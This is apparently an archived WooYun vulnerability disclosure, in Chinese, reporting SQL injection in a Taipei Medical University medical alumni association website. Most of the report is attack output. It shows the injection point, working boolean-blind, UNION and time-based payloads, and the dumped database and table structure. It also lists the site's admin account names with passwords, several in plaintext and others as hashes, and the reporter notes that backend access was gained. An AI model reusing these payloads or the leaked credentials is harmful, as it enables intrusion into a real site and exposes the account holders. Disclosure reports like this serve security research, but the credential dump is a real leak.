乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-14: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
台北医学大学医学系校友会网站存在SQL注入(大量用户信息、网站管理日志泄漏)
台北医学大学医学系校友会 **.**.**.**注入点 http://**.**.**.**/News_info.php?id=24
注入点 http://**.**.**.**/News_info.php?id=24
Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=24 AND 4262=4262 Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: id=-4137 UNION ALL SELECT NULL,NULL,CONCAT(0x71636d6671,0x47697478706a66614c73,0x71646b6271),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=24 AND SLEEP(5)---back-end DBMS: MySQL 5.0.11
当前用户数据库
current database: 'tmumsorg_manager'
跑表结果
Database: tmumsorg_manager[12 tables]+----------------+| admin || contact_us || forums || forums_detail || member_type || news || newsletter || no_member || northtreatment || photo || pub_species || publication |+----------------+
Database: tmumsorg_managerTable: admin[24 columns]+-------------+------------------+| Column | Type |+-------------+------------------+| date | date || identity | text || position | text || account | text || address | text || addressx | text || alumnus | text || birthday | date || category | text || donation | text || due | text || educational | text || email | text || fax | text || grp | text || id | int(10) unsigned || info | text || name | text || password | text || phone | text || sex | text || status | text || telphone | text || title | text |+-------------+------------------+
Database: tmumsorg_managerTable: admin[9 entries]+------------+----------------------------------+| account | password |+------------+----------------------------------+| rsadmin | d6589bdae89e3032925b5c3fa5738678 || nonno | nonno || tmums | ffb059247e12bbae13f2d7a4d77b3b4e || tmums | ffb059247e12bbae13f2d7a4d77b3b4e || sdr22463 | 513513 || Iblit | trhunter0421 || cy5367 | 2joxuxix || A122616889 | 2joxuxix || MSE | a9fc1a03386ae38b64e06c8172994963 |+------------+----------------------------------+
破解管理密码,可进后台,不继续深挖了
过滤
危害等级:高
漏洞Rank:17
确认时间:2016-01-14 23:27
感謝通報
暂无